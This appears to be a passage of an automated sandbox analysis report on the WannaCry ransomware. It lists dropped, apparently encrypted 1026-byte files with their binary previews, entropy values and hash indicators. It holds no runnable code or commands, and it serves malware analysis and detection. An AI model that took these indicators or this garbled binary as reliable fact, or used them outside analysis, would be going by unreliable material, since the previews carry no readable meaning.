                                                                              Preview:Q.W.p.j.m..0.p....0.....\$.....|..U_..^MK.......Zw..ZH.......;._|2..3f.Eep3..C.X;..!q.Iq4...Q][.y$L./_.`t...[@q...>J...Q..N00...+b......;1.Ir....i..ft.}.C:.................M......Z.1....K...Jc.4....." .n...\+.>..(..Q...r...[.O..~....l.......P.........1....Z.^.}..u...-.....*.M...}..;.3vn3;........%.P..-..^...0.?.l..?N....j4#*..u<....&...[Q.}...QF.q.5l3P5_`!.R.."w.!.V.d.[..8..l...w..........Vy.......Z...i.>.#....X....9.....+....e..q4.$..f;..Iy)...n.}SS.k.Tf.!.u...C...k.<......o.cZ......WW/.eZ.J.) _w...u....B.Ih..A$>#/\.%................(w2..H.P...0I.V"Xy...$.....(.+..1...=..;cF`...y.1.......!d...W.I.D...3.7..Z...ID.....:.2....f(\C........F2P..[.c6...%.].%._*....C..N....b... ..... 7.}m.C....._.K...3$.wd.......DF..F&.|)..8..~R.i|I.>n..m...3.......2.y...u.$B..*..M.`..Kk^...b)i.^.".F.[..F3j.~...\^.j\.....%,K..T.3...k/sgX..@.LJ.6G..R.5m...fw.Z.d+9..a..*..>3C...f.4j!.W9..4.V...6...>.y.O{BM._...L.RM.8K......=........y.y<....mB.=fc.@>X3...^.t
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.809567114610138
                                                                              Encrypted:false
                                                                              SSDEEP:24:lfiNLy6KnPpogtmk1Na647Jl39K51lpKx8drH7:BwO6qP2oRgld9IpD
                                                                              MD5:8231F46AA554597C066E2EE155D1CF12
                                                                              SHA1:63F83E9F2A9AF758EC9335771B8AE80C4C19A6F6
                                                                              SHA-256:C0162D5294B68809CD54ED27869B7980AA1F459003697176B4172F0651D7F645
                                                                              SHA-512:A4EB2E5C44A76CD0FC3FCC5D43E5318FA2BDB021AB5C08E898762223798E422C48FDBCFE4CAAF1AFA8D33B7CEA4F05576EBC107E7D9FC90FC322E2A8A6459D99
                                                                              Malicious:false
                                                                              Preview:%%....&_.}%1.q.R.\......{..1..O..q.`^...Bm...:Uz...y+...._......i."C.{.Z.L[."......L..R.....(s.....<.g>1-..v....K.{wk.1F ....Dsv....q_du{a......t.r..B<...$...SM...s.....(.L...#`<..0...y...Wnp.yg0;-...L]....s|.s.r.6b.hO.....|o.........j^F......2...,=h..s.%{..5....^J/v..;...k&.......OM,.&.D. ...Z.Z<R.W...C....6fT..F8R.h/.<.0T...m.?...h...i-......9..c...........4.X..I.Q..RB..mi..o..3...A.PM"[..n.<.y...J...R.....WM..G..,...H.s7....>E..........O...X@.&.\r.8."j....*GX}}..j.D..ZJ.^m...A..t.L..7_1p.-sN:...'}x...5...[.9..o.3..W.....).._..........<b....h.....n.?v=.|....Y .~6@.......x....}..u.y...pG'..%.z,..8..S@0\=@Y.9.:..V[aO....EG....'u!.0.K./.V_{.yw..G.k.Sn.C.c..9."..I.!.....O..D...eU...X...I#...e...rR....Amy[_5.Z....QT........k....G RU....$o........e..\}I0b.I..W......,...L.2W..l,.&M,...;a4....yx.A..g..Tm...._.D...Q@........cCD...W...f.Zm.uSc....VV.z.(...3.W..'M."\.'.t.7.4.Z......{...>L..p......U!........g.....'..f..E.....5aB
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:OpenPGP Secret Key
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.815501663136476
                                                                              Encrypted:false
                                                                              SSDEEP:24:v9dCCb8xNQOfWgPtS9KQNfw1vkt7YNFE3iMWhWv8YgYFc6u/G:v9/oLQO+gPtS9KQFIYgYFcrG
                                                                              MD5:C8D1FABBF416B8B274EF8099E7F638B2
                                                                              SHA1:E2B883B0BCEA9E14B41A9E3793A289A5748F26B4
                                                                              SHA-256:F3F1F230361D22249AAAF0597ABDFB79AB4F5999C35528C900BC5D6B2EF0B645
                                                                              SHA-512:F4793552713E7B839FA54A2CEE0B7A6C39B0973086D91120176153172B3E7E69D25CDF68D6FF12E99D191E8DB19D6898787B101AB7AA2F49D21F23A14CDBD32E
                                                                              Malicious:false
                                                                              Preview:..8O....gJ.....w...%..5..s......B../.+lf.....(3.M2..+.6.[...!...@@.}...'.]..&V"..i`..x..y.Y.B.>".......W...Y..F5.\...W....}\.E"(.N@..S..7.GI&.'S....`o..t?Pl!.nv..zp.$*.@..6.E1...+K&t.........O...A;.J?....y.U..8....k...@V....Oxg...<Q.I..>...w...?.p.I.. J...)..1......g..9.Ku~%P.v.v...........&$3..=...._V..1.......8?qd.^.*.cD{;I.A.b^..K.N...7 .n..H....v$...=.:8^.a.b........7....."bh.%%3.v.!.X..a=v.f.....O..T......_..7<T'.....i..Xz.....t0Q'2..<..%.q.)...p.!a=D.r._./G>..!&_yB.h...Q...d:C...f...F....{.].ee..... YF.b.mf.....2.f.V....(.<.g>.......xq.ji.ejF..{.........D....V2.....K%Vj..UO...8.f....lL.[.W..d......iL..g...qGPE.vx.l...k.0-...&...i.i"/Z......|>....N...S]..jF.6(L..Z./..l.h...I.z(..c..).{J.V.}37.Fiy.Fi.q.AE...8......k........TN....t...w.......Y0.`'.lW..*4.....[..Hj....*rTp..V.H.6W{..Y......t....tx.mAL..".H.2.h......I.Ug72../..9"./..N...M*.z..;.._....}.$...G..J...I...._.Y.q...&......3.,....JQ..&T.)...^._?....{.&.{.?..rsr..............q..o.e{.5
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.766799255264814
                                                                              Encrypted:false
                                                                              SSDEEP:24:dk1hDOgcjSU1ZB5axSm6i+m5ITqN+4tznFZgmxrjou:GHDOtWU1P5axSVqN7t7Pjxgu
                                                                              MD5:10E477CBCBE5E91C17AD1059DCFBBE87
                                                                              SHA1:32A097281A7308AFEEC178B34F599B2ED6368FC7
                                                                              SHA-256:56AF218AFC917B671D318CF3604B617470716E6D0C3B8973CB484FD5BEEAA593
                                                                              SHA-512:9D00209D33010CCC410D4C9B71FF155E180AB550E13A991B687BED0B21FE37F4A6473AD264323685B14202CE95ED8EFEDB3CA85822F006459D5C9A221ED917B8
                                                                              Malicious:false
                                                                              Preview:n..G....U.y..-...y.....\E]Y..x..:.[G#F...<.$U....0...j.x.h.4u..T....1R.R.A..B......b.....^..8S.{.....>&G.@...h....i...nOnp...d2cVm.S.=n1...5.S.....A..a5.N....PR....L..k`...1+N..I.b....:...J..5,pYxSLvx}U.9a...w....W.........Q.=).FZ.I.1;..Z.nU.bo.u..j.p....F...`.s......r.j.=..O.$...Z...T..P..?...^06....o....0..`.h.\.T..."....%.s5...{N..AF...U...m.i....3.u.%$.b.j83..(-....-.....mO....$S."...........F........N....J.....m..D..7..I...)@.w.....SHG..iOi.9...t.....n...5...5...J..u...e.CC...)...B..'%*j{...m..NO.gZV.z.....~...~...!o..W.Qs...9...-D$v..A..\..r...gj....Q.........GWI.....0i...U.2.Tv3.I.o...*Ex.5.....Y.@...T.........O....5.U.5.......e.R..o.$M.![..(.[...`....M...=...w.j..0.%.<.\..M.s.*.$......T.....L|.b.%....f.2..).6..5....M.E1$.3.WJ[......&.D.*....H.Zv.......#..4....v\'%....c...2.-.Zc........d..=T!.P.....=.....m..;.......F.SV.CX....NFA.......e.j....Cj.2"..[......1.G~w'...6.@..sJ.....A.R..B.....+.....|Y@M..wp....i.?.....b..0.....?
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.791112185156158
                                                                              Encrypted:false
                                                                              SSDEEP:24:FYQHrIyZe0Exb4jheTa0l/JC/TP4KkxMiaOpP6FOXLQ:Fb8yZe0ER4jheTaO/wTPt158ds
                                                                              MD5:854A7346BE61C86974DE703C53D34B34
                                                                              SHA1:827BD33E8D7D420CA0C076190775BD31F1E944AC
                                                                              SHA-256:3DC6CAA9D47FA778C23CEE9523A7B5D962CAE0AC4B2FFD939C2690A110F3FFE6
                                                                              SHA-512:1665E9F863E985A9CB20E9D21FA7F21490C99A38460D75627BB4FF35E545C31B13F06A5CAA06CFCE70B1D292659C4D2F30819702DE53ADE017667F4E51E900AA
                                                                              Malicious:false
                                                                              Preview:...v<..k..w.9.>...m...ss..M.5$..FGXIj.3X....-..! .;.......W_.>QD.8-.2..L.E.rD..L9l.q./Pzb^....'...a.#UM..>..7....^V.NG...P....z[.,.rM.9.k..4{..:.G|.`"..u..I..........a'...v..bZP....2..Y`..80.<....k.R...D9s.y..$".(a.uig....,6.0..........S..Y...Q.^|.s..X.1.%NYK1.A.4.b.o..5~)M.....13.1.L..B.g.K.dmeN.1&{..TF.w.>X>[RCb.g.y....CD.Yb.)$..!.u.|..M.....s0V1..U.K.v3o.....O.......K6..C...r.>.....^.CR..Ko..G.C.....S.p..........m|Y..pO..3FgHNKn...H.L%z........\....A...........x..x%.^..1.). ...F=cbW....IQ.Ra..S?7..|..;..T.)...nQ.{u.n.K2.6.Q_3..%-....(C.P-..=...kQ...?.gD...N|,S....E_...8...J.....g.g.............o6....f.H.U..q..2...6f\q....'...e....C,...x }.VQ....iC-....x>......j.u..h......J.tF.....i*.e........5......j...MY)..6.Wx...6.AZ.9.w...rMh.v"+.'....F.K..q,zU.W.n..2...[&......QI......3....|...H..N...c.D.N..dsQ.i`X..<.X6.$.}".0...U^.6........"...'...?O..H...@.Vd....}.......m.. j3.].).................C_.|..,...{.%....7&QK....i./1..Y.j..`$PrW
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.789345259246237
                                                                              Encrypted:false
                                                                              SSDEEP:24:QSYQKwlKzaFzbq5wf9Z/JlegM3qE7SqW4yzy:TZ7yef/yRqaSqPyzy
                                                                              MD5:F6DC3C5F776D9BCB748213EF1FB41E2F
                                                                              SHA1:AF529235FA54ED2EA06702C74C8BFAA8B474779D
                                                                              SHA-256:B803CDA45224DDF90585E301C7715AE4ACECAB5E65FB8FC0AD86759D6858DE01
                                                                              SHA-512:771E94AAD4F546066D5773C5F60C6E98CF00446D8BE6AEB39A3C5C9DAA0FB8B10DE80F4D764D0AA83B87BE680FFD1386CB0B1D3729EE13BE545341037DC2C009
                                                                              Malicious:false
                                                                              Preview:I.).1.+Sc.E..C.r.B..#H"o.w..+x]K.....i..4.7A0u..-d...l......8H...&..... ...BG.:<..Z.....qcfc..Dn.,c{3..8&.S.......r.Z\...f.x8.$.. \5... f..i.u..n@z..."...!.VwT.....V=...\I.C$P.j.3.T.{f.n...}IDP.q6.......S..%.....5.TWz@f.....tm...g.....'VA!.......W.i.&..Y`....D.........?J.:6...oc{(....w...C...M..[B.:g..X....j...J%a...T.l(..|...B...}U..+.....H...j...J.q...f&\3..#.U2. .!}l7.d..O.%....NEC3(..`.. . ........5w..yf.GaI..)....I..v.R....D.....I.0....^lb..cJ^.~......>....o..|..Z#ZQ....2.._..1....f0L.h3..7.-....]t.[s.%....X.si!.....w....xI_.h......D-\.G....L..5..[Om.M.M$....a8d.$...c...O...p..O..TZ.b.R.K........%ANjZ*Y'`..N....8..v.U.3..>.Ku/T. .o......7L..r.....F..lb^K...VLg..Wt.O.@.{..=Z..$. 9..n..y.....y.....nQt..o.....v.=.!G.m......p.....!{.o.\..'.....1.y..f...G&..cs"f...7FL..w...eb..#.~f.~...`Ua.0.f....i.`.C...\..o.../.'..~.Bn...b..n.....!..1...<..H.)}g...6.>..2...#vbz.X.u(t.0..#.W6m)...R....b.,...H0.R...A.!"2U.....!Z......5...f*5....#).l...L..V.|I
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.807916051266425
                                                                              Encrypted:false
                                                                              SSDEEP:24:5X8HCfHfiu9uDxyW1SjEZhUAiyrD5J1IvEB73:+HKHfixBIy2AiyrycBz
                                                                              MD5:8AD6DBC783E9ADEFA444C78E9C1C927E
                                                                              SHA1:B6EC7BD8AFA77F0AF13C0CFC583BA9EFB5EE6E8E
                                                                              SHA-256:D15D478DF20F2BC4B7DA0E513A17C846F052297514917679DB845B91DCD29491
                                                                              SHA-512:93C1B5121E59D61CFEE2F92A025C939D48F59E580FA16ACA1D9A58706AE76375DCAE3D9333AFAA1AE6C131013D1290E790CAFA9288345BFBA6261D3CCC554A0C
                                                                              Malicious:false
                                                                              Preview:...U...h..es..y?.9...o~7...z..QF$Sf.1.F.}.F..T.vw.9l'...N...................y.z..Z...8..B.!".........j....x....1..m.!]`Z..]...6..5.;..mrP.(.y...=..E..{..../4!..4......0{mx-...0$..U..:S5|.......A.....a...7.P.[.-...h7e.{...h..tr.G..]..^.Z.Q.H.x.../.J.T....-.L7..1.|.c......5..J....FG.V..T.++G.?.f.....Z...>.w/e...z_0.......u....!ccR,K..!...,.@....%...IK.=z..%.5M...Z..lX......JYV@}.0...r.+h....1w7.............i.....Z...=...5.....,...pXb.|j..]'...z<.R...c...M.u..gm:..w&z.].U.F.......[.{....!......t.e.+x..1PZ\.!.?.,....D.[y.@...]..V.L..R64".4c..M@..{1;.F.D...-...#.....j...n........9...v.k.4QY.}...RlI..4......)1..6o3._...].../.......P.zk..I."d..t....9..@..=...&.C..F.dF...^..UCg.z.@-.+i...rL4|.<..+....[.M;.!......-.y...{..d,'y.].....%...kT......&.5.....V~.....j...`$F.3.0.4$.c[.jGJc...QuT..K...}...%.GT..;.pO.o;...r.w..F.N...z........z..........E....c+.L.s..n.O]F..n...........p....=...j.".6..b.qd.?w.5kK?.Y.R...f5;..gP7.I....m.$#.....i....O#@
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.820286097712018
                                                                              Encrypted:false
                                                                              SSDEEP:24:Bmqxy9HUEXgBoZq2iy3R4hHvIeA6LBWZRJpFADS8US8LqSn:zy9HUMmY3aI6YDGDStV
                                                                              MD5:1B45BB0270BDCFCC369FA4029D379266
                                                                              SHA1:0D940BBD7E112FA9873C877C72BBA31E51D05565
                                                                              SHA-256:68A0C4AD6A5A4D028C6E5F09DFB23FF68B231C78847E879430DD412575F53199
                                                                              SHA-512:3784774BE340DF7973EBCB8FFEDD6315949E6EFAD50D79917BDCE72D25E09F668E94F936CC143EC0C98D468AB80B0DF04B331672FCDF419E01C0D6FEBCE15BAB
                                                                              Malicious:false
                                                                              Preview:....Xt..".AET...[<.l._.<......V.....Z.aR..K.D...z.qT.....U..oS..r.l..#Dp.w.a.v....._..c\;o...j......j..O...*.CZ.2....t...i.DP@.. .o.4L.6t.t8)..M..9^aQ?m.S,Xe.K..gx..Q..1.....^0...........k...{.C.!...4.....&.9N.LU..N.m]...8...#.$.:...A'.....9...U.C..N.........l<O....K..,.+PRd4A.".kg,..~..V...C...i....p.....-)2...0?P..;p0..+..p..a..t....r.e.M.c?5C<p7..O.<fn;9...2..=[.e........"......iD..y.m.._...A..}.u....D.u...@..(...|...^.g\W..I.u..k..?=eF.C.40..>(..u^...z....w.1...t&.6Z....B....G_M[..<$..E V...(..l.22'.d;he]SP.JX\.k...|././Y...>..D1.6.....<....Y...bF....z..$(D.B}8..^~....7.a{.~.W.>..C3.g....NW.S....&..}4.....PB...z5........f.r;.=..C.i.....pM?+..!.&..m..e.zh..M..6\....3#.`.e.4..y.. .C..m.#`....J9..F..<5.G&.>.......>.......>...5i+..-M..C...O...f~.....5A.(...Lq"~,P...60.2......[..6.......V.d..............@..n.=.{.4......./.Di4Q...Y.$....-g"(.A.d.He.aS..#.i.lmr.N.Ws.....m.a...D.j.apw*=..3....O.....#...vK.6...).+.y..bDL..*...q.+....7.$3.%+...k.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.797943766901883
                                                                              Encrypted:false
                                                                              SSDEEP:24:DmQo1MNaOT2ftKX/n49QU2/Gjwh3vxheqR1S/ZINCrbl:01Md2k4qAwhJhDSxIcrbl
                                                                              MD5:412215BC2459BE87EA7D352912B82860
                                                                              SHA1:A4C9C397BC5E2FBCF95ACEA49B1809D412AA97BD
                                                                              SHA-256:9CF37A863DE4A554C40F7EEBBE278D93FE75C7BBE4223144AD9A76A8E6D53CF9
                                                                              SHA-512:EF586AFABF1975CC8EDB80E9B4044058620EEC29FE2FBFE0C39749D5033698F9E98B2CD9CF3776B6F83E33D96912751D2A304B30FAB6AD3AFA6703B91F225569
                                                                              Malicious:false
                                                                              Preview:..^......5..n.."..`..C.e..X*}z.KR..@.{...5...MO...7.wi-.5....@......3.N.=..r...Bmf.}w..e~`c...<rxNa.....\...p..c..s...H...x.p.J...!..V.. ..+.....V/.p..D.......A(k........=....z..ZJ..L\?T ..\{Z..2.."t(......}.![........aq..l..A.Z..8=..H..qa."....?...I.h.&f..`O.-........f.l.3+...A.%."...w..\.+Y....=g...M.N.O.XJ......Z...v[.Q..V...nS...N!.[N\1..P..<C..\.."...J.....8.]+.....V.....).BI.....Fr.U.J..(...-4......HrW.l.Z....O.>.$.A?.."..>px.1...l.3....g.]5.....d.<...."&f...L...W.U_.+..K.....F8:..7F.[.....V.w....3..\...b.>J.r5v.[k|.&..........ek.bI<..q.%.O...lSg@.=...<.q..?.....{..-x[.....2.....egX.Eu....S. .Uw...l.g.d.X...6..(,.B.......;.}@.i.h...y..../.+.R..m.L...!..O:...*C....&.1......Q.M....]F..9.P.N._...._.C..$.C.4....].-.+f3H..^.4Oh.."\..D.......W.2...w}z..4.....DR.VL..z[..C.u..J..3.T7Sh..f.\..gG......w...L............;.7...Q..$.pE.....rc...%....../"..c4..u...$...E]..k...z.hR..|......B.d..G....#5.M.)..B9SR.........d`.....4r.....D.(..H...\d
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.811778299773159
                                                                              Encrypted:false
                                                                              SSDEEP:24:DTWmccvBJmSsZQc/wkyEcy86IAjoZ0FUTnd:DTHBErZh1FIDZuUTd
                                                                              MD5:33D22493F2AD73972B748AAB972CC8C8
                                                                              SHA1:F88434FE77C490C3BA9926267F8A474FDC30DE2F
                                                                              SHA-256:A5F1E7FE71617598AA2197654747250935C0619ED4941293869C731C2030A4D8
                                                                              SHA-512:350DBF2B1DA19B004E7F6F4383AA44AB25E1DECABCDEF0BD49E447727D425CAD5E195AE602987EEA277569F741363C4E13E960A5E7C54E35AB20106ED31A989A
                                                                              Malicious:false
                                                                              Preview:...`.J.6.....o....j@..e.g..T..M.;$?9.....M.]<....je^..!.GP3.{...e...k....C..n.Q.20=...U...~.'zo..b........].Y.9.,...]..P..p...0...6o....]`J._#...*.........]....k.R}..$8z.~...%..}B.:4.u..%).O..r\..qK4..v_85.i.?&o.%..T.k...M.J.`.%m.....C$..&P....&...^@>O1qx...6..n../.0.o.....7f...v.QD.iz.M.h.:%H..6.k}.Y........"v..B.j!u...!..\..A(.a.WaH.~.N.]H...1...9.&..\..&8G.XlI.L.fi&...|`}~........3xDZ....w!pK.5.......$?.5.Vh..5B..&..).kM'T..E.....u...S...a8.E....N...|3...Zh.Pd..G.....H.,:~....R.J...h...%...o6.[..^..,Q..s..\.M.a.p.z.,...Jv"VG.{..%+f..j.D^.....Afb.!B..C..|.........3um...1./...q..ag$+?..Z.....~J.O~..P.7x....[....j"..AV(.b..MCyp...[..c.......6..I?....}>...k'f...p.uZp....:@..-...MrW<..Q\...~"2;.......V1..x....+'k.a..E...x.^I..p0...._......8..)C..|.........^..z...G.\.il fI.*X.....1.....1.."..%.Q..}X.....3$.DX.p.e..".............1.r.9Q?"N.L..}..2.9...o.I.I..UP. .Q.me_..]...3.....e.}P...%.e..#...K!.rG.S..{.u...4.V.W...V;J./...........3...I.-..y2.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.812134223843723
                                                                              Encrypted:false
                                                                              SSDEEP:24:kDHefbfuUs+x4Sob6YlGWh4/bucCHPyCNoH03dq7/6kspkrkfZL/J29Xe:kD+fbfuHoY6Y8Wh4/acQi8A7LsqSZ7Jb
                                                                              MD5:B10A8ED8E5446234AFB5712852D1E1FE
                                                                              SHA1:0A3488E8085E9E315109F33A10A028682493AA58
                                                                              SHA-256:2FA12A1759118CD2CECA16A1562080914FE00D226E4438CC98DDFE19B3453B72
                                                                              SHA-512:A490A492779D9ACF7DE335D8336174D67EEA54E7E00CBBF7D2776A137FA5FC579833E52E0B9783A9C37A8E5D40B97F018730188756E615C6F4DAEA3AC56CDD4B
                                                                              Malicious:false
                                                                              Preview:....~+.2X<...s.,....cch..oj.C../.AsAW..#}P..n.nRUz5I^.^R..u.".9..=....Y.H.....-D./...e.h~$6.t..o.....t...L..V<%.x.........V)R..-.........)ZD<.8.D.2."%+.5k...9...g...k.|.....#pkS..7......?.$y.H^GH....X.J..y5.wY4.&.A.........Z...}V@......U....E..e.L.;...._Ma.~.|..V.|c..uk.Ld..........,4..pQ....E..H....E..Pt.-w..#T.b.}.............f..g.}.]../ ...4*.i....4...Wur.[{<....C..%.1..rY.j.f...%._../.V^.m.#..fZ...7I..O.#..@<...|...~M9....D.....~+.L..G-/...^$.......p.f...Q..z..kxC.....).&.. .D.i....1d......us.w.z...y..+.F...V........9.....&.{"Ef.Dy.........l.......I|....!.zk ,wq...t......i.'!B.e....A.......3TP.^..j....*.'..[..f..?.T..#..../,.?............3.p..D.l..)..k.M...0...S.`.....P. /.;[ zr........w<y.\.>{....'A..+...BD4..?...`........2.w}.....9.Z...>0.L...!....M...n.?...<.G.,...R....F>.A.tX.D..'..h'...{.E....X..(..&A~........=U..n$..ON.... mAp.....3.>u.sa.#..3.iG......c.Q+...::.....T...S|...c ......?...~..8..Cs...j.t~...h1h.[7
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.8208721349703465
                                                                              Encrypted:false
                                                                              SSDEEP:24:rL+r6KxPYOoEanH4dHjwka9yiGSqYaNf0+jrn2yoo4FQQOGICxA3pO:/nOM3nHw5aEiRqYaNoBQwICxz
                                                                              MD5:A01764D463FAEA7DC913E30091F464F1
                                                                              SHA1:7EC03727CF3035D2B959B3404619BB98D1B88A4E
                                                                              SHA-256:B079D5CFE8E5F7FC502EBC4D718E1B1D91D2E4C63F29E4423ECE92E46E847387
                                                                              SHA-512:D91AE36B4FD7FCE5A62FDDCE7359058B17CCE26E6BF939FB8A86F361DC5E810E61BF65806D9B90470A44C56C8A7E676243C8ED1F16E2490E328C098932FCB4EB
                                                                              Malicious:false
                                                                              Preview:N9Q..`j.Z....'m0B..#...%6W.l.5......8..Y....6..\...#.t.N..'iHH.:uIKI....Q......6......^2f.......PS. ..!N...........S.n*.b...M.g..t..."....(..M.._.)..X...[a1....Tf....e...h0......A.f...^....<C.......:..[..;<...ii......zy.oH0..(.u.Q..7...a}.`....%.Q....e..K.."...o.....a=Ba.u....we.@.!..Xf..3.5......3C]...3......%.S0...kg.$.6....c9=d.....*U..69.."Fl.E.ej.O..7.......?...ZO'...R...V.&.|.......... .7...u.EL..D..^.s.j....[.M...x...V.#.LH.x..( .W..4....E.f.&..^A.."....a..N..[.[t....BY.el.l*.g.E-...+.....x..]/.k..f.c...}3.1.E..^Q.$..5.z....\.._.%Q\g...l..o.?..J*.0.~pG.j..,<YN]#|g...Ws.R.d ...w..a..d......S'^\.L.3.:....[.....-.!_...|.............AN2/....?<=.......3...5?H..w.R-z....s2..!...i..9.\..\.uh.R.G..-.#)....A......S.P...'..F.............4q..Lq_....a.......*.r`h.D...<....7Z....m.....9}..%:.L....$.......W..2..4.+.......D.-..[..:.O.U._.$.w|.....(...M.v<......0Op&.'.>.:....o.=c.|.5d...c.N..&N..b..]Q../>e&..\n...SQ..<.L.B...Fq.9.."...i
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.806264788497839
                                                                              Encrypted:false
                                                                              SSDEEP:24:xFIli9Bjsz9GS9q6WRt2An2miftBQy1gsa/y1J5meadlNd/kLje23:fEi9BjUY2A2mUtB71gsCy16DT+Si
                                                                              MD5:782E900BB2CBA34D6A2BB5BAF4D41F9B
                                                                              SHA1:9E0EAC7227AEF3B5DABC664912511F862D1AAEA0
                                                                              SHA-256:5AADDAEB87CCA38C3309B0A8BD5E2EAE1A4095FF32E8F66830C833AAB1744F9B
                                                                              SHA-512:F971347262E4332CA7222468315E93BDB5DF4BE5130CA64E6D1EC0841E7A7FC2649649D2A8098B2322A8DDF951FA1B63B27AAD00576236372547A6A595942092
                                                                              Malicious:false
                                                                              Preview:....A.. .P1`...g..0N.7.....$.8...Q/.W.Y..a..\..4...k.~d^Z.0.B....X.>.X..2......Ji...z.....W...{8{A...n.0'....-......jb..@..k..D..Q.U..Cw...>..v...c...m...X%.I.>Q.9../.S1.A..38M...SU......:......kc#&..*C.'.....y.`...t..j..Y..E<m+!w.+NC./..-4.....-......a.b.=....J.SD*W..Z...nw>.A.|.u..lz".[.h...5..BH.(........}....7...<.#.t>...#..V.t|......FW.L..X.:."..e...^..>6..kG...V.!.x...:.....m.`.<.}.f.i.x+Ao_...}^...]........!..a.....f?`.kR@..V.........^..a.5.,c...E.z.a..T.&XA.)Ef.B.....`{$...:...&I.r&......c..{...,.=A.O7...ht....?....G.:....)4J?*)M..j..2...K2...{...?%'..X,...v..Vt,...m....J.....#M...dl.@0.C.IV&.I.w.z....[.......RL+.v%..r.s...z..*}.K... 2KL..H.T.(.(*.f.@..a.v.......N}.@....;.....i....kK.|...-.&.Z..s.......Hz(..F....yh.....5..."Ij.4......a.......5,.!...}.^*.......aq..'....s<a.!."6E...,..\.v.v...m..m.:.....$..G.k@..4J.../tK..<bC.<M.M:./?.b.....0.Bgh,......c.....?..oQ&.@c%x..>x*i..F.3.....*.T.0.......GY\.^N7H.[.w.VC.D$..$..UI&.2..v/.\.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.825747547187061
                                                                              Encrypted:false
                                                                              SSDEEP:12:3xj5QnwsGLCt+MujyPWjcCNSOwBcVcH1ST02NsJo0ThlzTH/vQwVWkb9enFu28XA:3DQ5fAjyW/wBcVs1HomlvgmX20beUgkA
                                                                              MD5:49ACD1181D3FB2F6A36796BF64FC3A5C
                                                                              SHA1:D5F6BF125E4CCD34C682567318966CB9070C3631
                                                                              SHA-256:4DFE38D26E9371685981376567457210E64F07470B4C5F4D2F972BC052B0AC26
                                                                              SHA-512:C24A3DDA7AE2507578C735008E8DCACC5D19599534E75C86E19C3A4D7F4A9C89C08DC10658BE0C91C9370B99032D3B71E8FB92F4DCA351503A1008BD1EF7112B
                                                                              Malicious:false
                                                                              Preview:t?.,!...18-.f0.........j,td...5[..,.f.F!D..4hx...tU..<.;....."n..t.........5.F..&p...y h...q7DI..A`.*[*....w.%.....=u.B.`f....sE1...{F..._K...u.@.nY.h..-.3A.+!..+..'#..V.>7.*..Wf.`...i`.%.N.$Wa...zC..j.4t$.f......,E{..du.#.t}f..3a....(..j..YdK~.....-.P............^.#..u.{.....m.xL.j..O..?..&LT?.Q..1.0...S..[a..E.H......w..j.)...>....+U^...u.]l.6I...".!].Q<.B.%.^Z.t...L...x=r..9.(D.0.)...&...c...?.j.=d$t..D..?..'.hm.(*)oGA..T.9l....zJ...1...q...'......._.B.^.=Z..p.z.bcN.](.....WF:..L......m.Z./J6L....{..gyQf....n..7..-.k7.."...n.....'....M...<b...X..C.>.....z...W.....<...?{......*..]..~..-.\...3..GT...........j....xx(J.....g._./q...G..<..K..g.]k*..R<(z'....F..?G..;.O...{..k.~H.v.1....N#9....'...F.%.@.......JIiwP...S....J.U..i..p...../.gg.o++.0s.O...tV.M|...J.t,..;....=...j...F@..WP}^Um....A.....>.u....,.:JK.Mld.-....e..>....,.]..."Ba.i...C.{..D....yB..{S.q...C.`..Fb.4..9d....F..m.*...Nt.ickbAU....a.$..W...j..Tm.t..8......E.Th....Y..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.81153070894513
                                                                              Encrypted:false
                                                                              SSDEEP:24:kCA1ZRNGthrqD14qgb6WUEamniGxrTmIM5HAnytMzMcEfV:BAtNSr44Xb6WUEamniGxrSf5HlcEfV
                                                                              MD5:58FDEC768479AEC633FF6AF3DEB6D7AE
                                                                              SHA1:D5332337C2B1103D13B1E55EB55C3D12862B9FE1
                                                                              SHA-256:D997F2ACC41BE6C311652FF77435D73D1B1FA867AE9270E9ECE893B5D21AC66C
                                                                              SHA-512:2175995C66A464B61F20A0C2B894EFDDCFDA2E0C09A05FEB3A88DF269082BC7C6F4514056675B7A3698A15A68AFD178528523FA4D6E7E39027AAB65D1F53BAF3
                                                                              Malicious:false
